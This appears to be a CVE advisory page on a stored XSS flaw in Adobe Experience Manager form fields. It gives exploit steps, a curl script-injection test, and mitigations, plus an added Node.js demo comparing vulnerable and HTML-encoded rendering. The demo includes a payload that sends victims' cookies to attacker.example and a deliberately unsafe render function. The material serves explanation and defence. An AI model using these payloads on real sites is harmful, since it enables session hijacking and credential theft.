How CVE-2025-47039 Works
Adobe Experience Manager (AEM) versions 6.5.22 and earlier contain a stored cross-site scripting (XSS) vulnerability in form fields. An attacker with only a low-privileged account can submit JavaScript into a vulnerable input field, and the instance stores it without adequate output encoding. When another user later views a page that renders the stored form data, the script runs in that user's browser in the origin of the AEM site. The payload persists until the stored content is removed, so a single submission can hijack sessions, deface pages, or steal credentials from every visitor who loads the page.
DailyCVE Form
Platform: Adobe Experience Manager
Version: ≤6.5.22
Vulnerability: Stored XSS
Severity: Medium
Date: 2025-06-10
Prediction: Patch by 2025-07-15
What Undercode Say
# Submit a test payload to the form endpoint (endpoint path and hostname are placeholders, not a real AEM path)
curl -X POST -d "input=<script>alert(1)</script>" http://aem-instance/formSubmit
# Search component sources for places flagged as rendering unencoded input (path is a placeholder)
grep -r "unsanitized" /var/www/aem/components/
How to Exploit
1. Authenticate with a low-privileged account
2. Submit a form field containing script markup
3. Wait for (or lure) another user to view the page that renders the stored data; the script executes in their browser
Protection from this CVE
1. Update to AEM 6.5.23 or later
2. HTML-encode stored form values on output (and validate on input)
3. Deploy a Content-Security-Policy that disallows inline script
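The exploit steps above and the first two protections are easiest to see side by side. The following Node.js example is added here and is not code from the advisory, Adobe, or the Undercode page: it models a form-submission store, renders it once the vulnerable way (raw concatenation, the bug class the CVE describes) and once with HTML encoding, checks both outputs for active script, and builds the kind of CSP header that blocks inline script as defense in depth. The field names, payload, nonce and attacker hostname are constructed for illustration.

```javascript
// Added example, not from the original page. A constructed in-memory store of
// form submissions, standing in for the persisted form data on an AEM instance.
const submissions = [];

// Step 2 of the exploit: a low-privileged user submits a form. The server
// stores the field values as given, which is fine on its own; the bug is in rendering.
function submitForm(fields) {
  submissions.push({ ...fields });
  return submissions.length;
}

// Vulnerable rendering: stored values are concatenated straight into HTML,
// so markup inside a field becomes markup in the page (stored XSS).
function renderVulnerable() {
  return submissions
    .map((s) => `<li><b>${s.name}</b>: ${s.comment}</li>`)
    .join('\n');
}

// Fix 2 (output encoding): every stored value is HTML-encoded when rendered.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

function renderHardened() {
  return submissions
    .map((s) => `<li><b>${escapeHtml(s.name)}</b>: ${escapeHtml(s.comment)}</li>`)
    .join('\n');
}

// Detection check: does rendered HTML contain a script tag, an inline event
// handler attribute, or a javascript: URL? Useful for scanning stored content.
const ACTIVE_CONTENT_RE = /<script\b|\bon[a-z]+\s*=|javascript:/i;
function containsActiveContent(html) {
  return ACTIVE_CONTENT_RE.test(html);
}

// Fix 3 (CSP): only same-origin scripts and scripts carrying the per-response
// nonce may run, so a missed encoding still cannot execute inline script.
function cspHeader(nonce) {
  return `default-src 'self'; script-src 'self' 'nonce-${nonce}'; object-src 'none'; base-uri 'self'`;
}

// Constructed attack payload for step 2: exfiltrates the victim's cookie.
const PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Runs the whole flow and returns both renderings and the check results.
function demo() {
  submissions.length = 0;
  submitForm({ name: 'alice', comment: 'Looks good' });
  submitForm({ name: 'mallory', comment: PAYLOAD });
  const vulnerable = renderVulnerable();
  const hardened = renderHardened();
  return {
    vulnerable,
    hardened,
    vulnerableHasScript: containsActiveContent(vulnerable), // true
    hardenedHasScript: containsActiveContent(hardened),     // false
    csp: cspHeader('r4nd0mN0nce'),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Step 3 of the exploit is the victim's page load: in the vulnerable rendering the stored `<script>` tag is parsed and executed by the browser, while in the hardened rendering it is shown as literal text. The CSP header is a second layer, not a replacement for encoding; a nonce must be regenerated per response and attached to every legitimate inline script.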
Impact
1. Session hijacking
2. Data theft
3. UI manipulation
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode